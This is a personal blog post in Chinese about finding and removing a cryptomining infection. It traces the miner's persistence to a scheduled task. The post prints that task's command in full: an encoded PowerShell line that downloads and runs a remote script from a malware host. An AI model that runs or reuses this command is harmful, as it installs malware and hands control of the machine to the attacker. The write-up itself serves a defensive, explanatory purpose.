昨天從網上下了某個BT種子的工具,第二天電腦卡的一匹,並且defender頻繁報毒。由於報毒項名稱是officekms.exe,由於之前是使用過kms激活office,所以先不管。另外有兩項go.exe和goo.exe不斷被殺,不斷重生;在任務管理器里發現了一個進程叫XmRigMiner的進程,網上說是挖礦工具,在C:/ProgramData也發現挖礦工具,於是確定被植入挖礦病毒。
首先進入到目錄C:/ProgramData,刪除不明的程序,然后進入go.exe和goo.exe的目錄C:/Users/Public,發現5個病毒文件,刪除之;又發現一個文件夾"1",里面看上去有大量不明文件,刪除之。后來發現windows defender又報毒,程序又重生。立即刪除了重生的文件。然后我把C盤和D盤翻了個底朝天,竟然一無所獲。
后來發現病毒又重生,於是,發現礦機重生時powershell在后台運行,並且cpu比較高。於是結束了powershell。卡掉的機器直接就流暢了。所以判斷惡意程序使用powershell重生。查看defender,發現昨天夜里病毒大量重生,且規律地每28分鍾就重生一次;
懷疑是計划任務。打開計划任務管理程序,果然,發現一個可疑的計划任務,每隔28分鍾運行powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA
后面的字符串看着就像base64,於是心中竊喜,到網上解碼。
打開網址,就得到了明文的挖礦腳本。禁用這個計划任務,就阻止了病毒再生。珍愛計算機,遠離不明軟件。
(update 2020.10.16)事后一個月在網上查找,上面那網站是和匿影組織有關的網站,之前這個網站上掛了wannaren勒索病毒,到某一天就刪掉了下載勒索病毒的代碼只留下礦機。只中了挖礦病毒已經是一個比較好的結果了。這個網站到現在還沒被牆,GFW真是個屑牆......